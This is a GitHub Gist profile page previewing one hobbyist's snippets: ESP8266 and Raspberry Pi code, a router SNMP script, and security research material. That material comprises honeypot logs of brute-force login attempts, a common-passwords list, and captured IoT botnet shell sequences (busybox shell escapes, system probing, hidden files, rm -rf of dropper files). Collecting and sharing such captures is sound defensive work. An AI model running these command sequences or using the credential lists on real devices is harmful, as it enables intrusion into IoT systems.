Skip to content

Instantly share code, notes, and snippets.

Avatar
😎
Hack The Planet!

Ondřej Doležal odolezal

😎
Hack The Planet!
View GitHub Profile
View log_ipv6-mac.pl
#!/usr/bin/perl -w
#Skript se pripoji na router, stahne si ipv6 tabulku neibru a celou ji zaloguje i s pouzivanymi mac. Zivost adresy v tabulce je v minutach a defaultni hodnota je 4 hodiny.
my $router_ip="xxx.xxx.xxx.xxx";
my $router_comm="xxxxx";
use Net::SNMP;
use Data::Dumper;
use strict;
use Sys::Syslog;
@odolezal
odolezal / esp8266_getVcc.ino
Last active Apr 28, 2020
ESP8266 Internal input voltage reading
View esp8266_getVcc.ino
// Define input Vcc reading
ADC_MODE(ADC_VCC);
// ESP8266 Internal input voltage reading
float vccIn = ESP.getVcc() / 1000.0;
Serial.print("Input voltage (V): ");
Serial.println(vccIn);
@odolezal
odolezal / bap.log_[2020-04-10]_sample
Created Apr 13, 2020
Sample from bap - http Basic Authentication honeyPot
View bap.log_[2020-04-10]_sample
[2020-04-10 23:35:01,748] 188.161.169.188:4905 Basic admin:admin
[2020-04-10 23:35:05,376] 188.161.169.188:4921 Basic admin:admin
[2020-04-10 23:35:05,627] 188.161.169.188:5160 Basic admin:
[2020-04-10 23:35:05,899] 188.161.169.188:5180 Basic admin:
[2020-04-10 23:35:06,140] 188.161.169.188:5197 Basic :admin
[2020-04-10 23:35:06,363] 188.161.169.188:5214 Basic :admin
[2020-04-10 23:35:06,724] 188.161.169.188:5229 Basic admin:
[2020-04-10 23:35:07,699] 188.161.169.188:5253 Basic admin:
[2020-04-10 23:35:07,939] 188.161.169.188:5321 Basic admin:admin
[2020-04-10 23:35:08,160] 188.161.169.188:5339 Basic admin:admin
@odolezal
odolezal / bap.log_[2020-04-03]_sample
Created Apr 7, 2020
Sample from bap - http Basic Authentication honeyPot
View bap.log_[2020-04-03]_sample
[2020-04-03 16:15:48,699] 134.122.88.165:60175 Basic admin:
[2020-04-03 16:15:49,098] 134.122.88.165:60971 Basic admin:
[2020-04-03 16:15:49,556] 134.122.88.165:61586 Basic root:Bnet014175
[2020-04-03 16:15:49,931] 134.122.88.165:62188 Basic root:Bnet014175
[2020-04-03 16:15:50,797] 134.122.88.165:62687 Basic admin:Asd753JKl
[2020-04-03 16:15:51,254] 134.122.88.165:63872 Basic admin:Asd753JKl
[2020-04-03 16:15:51,793] 134.122.88.165:64454 Basic cryo:trapolla
[2020-04-03 16:15:52,187] 134.122.88.165:64956 Basic cryo:trapolla
[2020-04-03 16:15:52,658] 134.122.88.165:65423 Basic admin:HappyPass
[2020-04-03 16:15:53,125] 134.122.88.165:49934 Basic admin:HappyPass
View 10000_common_passwords
password
123456
12345678
1234
qwerty
12345
dragon
pussy
baseball
football
@odolezal
odolezal / simple_webserver_makerphat.py
Created Dec 11, 2019
Control Raspberry Pi GPIO via http web server: code designed for Cytron Maker pHAT
View simple_webserver_makerphat.py
#Control Raspberry Pi GPIO via http web server
#Original code from: https://github.com/e-tinkers/simple_httpserver
#==================================================================
#Code designed for Cytron Maker pHAT
#===================================
#Added:
#support control for all 8 LEDs ("/ledX/" URL endpoints)
#support control for buzzer
#some minnor HTML code changes
#=============================
@odolezal
odolezal / led-blink.py
Last active Dec 11, 2019
Random LED blinking for Cytron Maker pHAT
View led-blink.py
@odolezal
odolezal / Gemsbok_malware_sample_1
Created Nov 6, 2019
Catched by Telnet-Iot-Honeypot
View Gemsbok_malware_sample_1
enable
system
shell
sh
linuxshell
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
@odolezal
odolezal / Okapi_malware_sample_1
Created Oct 27, 2019
Catched by Telnet-Iot-Honeypot
View Okapi_malware_sample_1
enable
system
shell
sh
ping ; sh
linuxshell; /bin/busybox LMAO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LMAO
/bin/busybox LMAO
>/tmp/.file && cd /tmp/
/bin/busybox rm -rf .file .z.binary .z.dropper
@odolezal
odolezal / Gopher_malware_sample_2
Created Oct 26, 2019
Catched by Telnet-Iot-Honeypot
View Gopher_malware_sample_2
enable
shell
sh
linuxshell
bah
hostname Ex0_3860
/bin/busybox Ex0
/bin/busybox ps; /bin/busybox Ex0
/bin/busybox cat /proc/mounts; /bin/busybox Ex0
/bin/busybox echo -e '\x45\x78\x30\x31/proc' > /proc/.nipped; /bin/busybox cat /proc/.nipped; /bin/busybox rm /proc/.nipped
You can’t perform that action at this time.